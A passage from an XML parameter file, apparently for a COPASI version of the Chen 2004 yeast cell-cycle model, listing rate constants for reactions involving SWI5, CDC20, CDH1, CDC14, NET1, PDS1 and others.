<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of SWI5],ParameterGroup=Parameters,Parameter=ksswi_p_p" value="0.08" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksswi''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SWI5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SWI5],ParameterGroup=Parameters,Parameter=kdswi" value="0.08" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdswi],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SWI5P]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of SWI5P],ParameterGroup=Parameters,Parameter=kdswi" value="0.08" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdswi],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of SWI5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of SWI5],ParameterGroup=Parameters,Parameter=kaswi" value="2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kaswi],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation of SWI5]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation of SWI5],ParameterGroup=Parameters,Parameter=kiswi" value="0.05" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kiswi],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of IEP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of IEP],ParameterGroup=Parameters,Parameter=Jaiep" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jaiep],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of IEP],ParameterGroup=Parameters,Parameter=Vaiep" value="0.001536552944821854" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vaiep],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation],ParameterGroup=Parameters,Parameter=Jiiep" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jiiep],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation],ParameterGroup=Parameters,Parameter=kiiep" value="0.15" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kiiep],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of inactive CDC20]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of inactive CDC20],ParameterGroup=Parameters,Parameter=ks20_p" value="0.006" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks20'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Synthesis of inactive CDC20],ParameterGroup=Parameters,Parameter=ks20_p_p" value="0.6" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks20''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of inactiveCDC20]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of inactiveCDC20],ParameterGroup=Parameters,Parameter=kd20" value="0.3" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd20],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of active CDC20]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of active CDC20],ParameterGroup=Parameters,Parameter=kd20" value="0.3" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd20],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of CDC20]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of CDC20],ParameterGroup=Parameters,Parameter=ka20_p" value="0.05" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka20'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Activation of CDC20],ParameterGroup=Parameters,Parameter=ka20_p_p" value="0.2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka20''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation_2],ParameterGroup=Parameters,Parameter=k" value="1" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1 synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1 synthesis],ParameterGroup=Parameters,Parameter=kscdh" value="0.01" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kscdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1 degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1 degradation],ParameterGroup=Parameters,Parameter=kdcdh" value="0.01" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdcdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1i degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1i degradation],ParameterGroup=Parameters,Parameter=kdcdh" value="0.01" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdcdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1i activation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1i activation],ParameterGroup=Parameters,Parameter=Jacdh" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jacdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDH1i activation],ParameterGroup=Parameters,Parameter=Vacdh" value="0.2498295509602317" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vacdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation_3]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation_3],ParameterGroup=Parameters,Parameter=Jicdh" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jicdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Inactivation_3],ParameterGroup=Parameters,Parameter=Vicdh" value="0.009132056237052346" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vicdh],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC14 synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC14 synthesis],ParameterGroup=Parameters,Parameter=ks14" value="0.2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks14],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC14 degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC14 degradation],ParameterGroup=Parameters,Parameter=kd14" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd14],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. with NET1 to form RENT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. with NET1 to form RENT],ParameterGroup=Parameters,Parameter=kasrent" value="200" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasrent],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. from RENT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. from RENT],ParameterGroup=Parameters,Parameter=kdirent" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdirent],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc with NET1P to form RENTP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc with NET1P to form RENTP],ParameterGroup=Parameters,Parameter=kasrentp" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasrentp],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. from RENP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Dissoc. from RENP],ParameterGroup=Parameters,Parameter=kdirentp" value="2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdirentp],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1 synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1 synthesis],ParameterGroup=Parameters,Parameter=ksnet" value="0.08400000000000001" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1 degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1 degradation],ParameterGroup=Parameters,Parameter=kdnet" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1P degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Net1P degradation],ParameterGroup=Parameters,Parameter=kdnet" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[NET1 phosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[NET1 phosphorylation],ParameterGroup=Parameters,Parameter=Vkpnet" value="0.3324302671175433" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[dephosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[dephosphorylation],ParameterGroup=Parameters,Parameter=Vppnet" value="0.410453463847625" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[RENT phosphorylation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[RENT phosphorylation],ParameterGroup=Parameters,Parameter=Vkpnet" value="0.3324302671175433" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vkpnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[dephosphorylation_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[dephosphorylation_2],ParameterGroup=Parameters,Parameter=Vppnet" value="0.410453463847625" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vppnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of NET1 in RENT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of NET1 in RENT],ParameterGroup=Parameters,Parameter=kdnet" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of NET1P in RENTP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of NET1P in RENTP],ParameterGroup=Parameters,Parameter=kdnet" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdnet],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC14 in RENT]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC14 in RENT],ParameterGroup=Parameters,Parameter=kd14" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd14],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC14 in RENTP]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of CDC14 in RENTP],ParameterGroup=Parameters,Parameter=kd14" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kd14],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[TEM1 activation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[TEM1 activation],ParameterGroup=Parameters,Parameter=Jatem" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jatem],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[inactivation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[inactivation],ParameterGroup=Parameters,Parameter=Jitem" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jitem],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC15 activation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC15 activation],ParameterGroup=Parameters,Parameter=ka15_p" value="0.002" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC15 activation],ParameterGroup=Parameters,Parameter=ka15_p_p" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[CDC15 activation],ParameterGroup=Parameters,Parameter=ka15p" value="0.001" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ka15p],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[inactivation_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[inactivation_2],ParameterGroup=Parameters,Parameter=ki15" value="0.5" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ki15],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PPX synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PPX synthesis],ParameterGroup=Parameters,Parameter=ksppx" value="0.1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksppx],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[degradation]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[degradation],ParameterGroup=Parameters,Parameter=Vdppx" value="0.8999351532761247" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdppx],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PDS1 synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PDS1 synthesis],ParameterGroup=Parameters,Parameter=ks1pds_p_p" value="0.03" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks1pds''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PDS1 synthesis],ParameterGroup=Parameters,Parameter=ks2pds_p_p" value="0.055" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ks2pds''],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[PDS1 synthesis],ParameterGroup=Parameters,Parameter=kspds_p" value="0" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kspds'],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[degradation_2]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[degradation_2],ParameterGroup=Parameters,Parameter=Vdpds" value="0.1260054117516113" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdpds],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of PDS1 in PE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Degradation of PDS1 in PE],ParameterGroup=Parameters,Parameter=Vdpds" value="0.1260054117516113" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vdpds],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. with ESP1 to form PE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Assoc. with ESP1 to form PE],ParameterGroup=Parameters,Parameter=kasesp" value="50" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kasesp],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Disso. from PE]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Disso. from PE],ParameterGroup=Parameters,Parameter=kdiesp" value="0.5" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdiesp],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[DNA synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[DNA synthesis],ParameterGroup=Parameters,Parameter=eorib2" value="0.45" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eorib2],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[DNA synthesis],ParameterGroup=Parameters,Parameter=eorib5" value="0.9" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[eorib5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[DNA synthesis],ParameterGroup=Parameters,Parameter=ksori" value="2" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ksori],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Negative regulation of DNA synthesis]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Negative regulation of DNA synthesis],ParameterGroup=Parameters,Parameter=kdori" value="0.06" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kdori],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Budding]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Reactions[Budding],ParameterGroup=Parameters,Parameter=ebudb5" value="1" type="ReactionParameter" simulationType="assignment">
<InitialExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ebudb5],Reference=InitialValue>
</InitialExpression>
</ModelParameter>
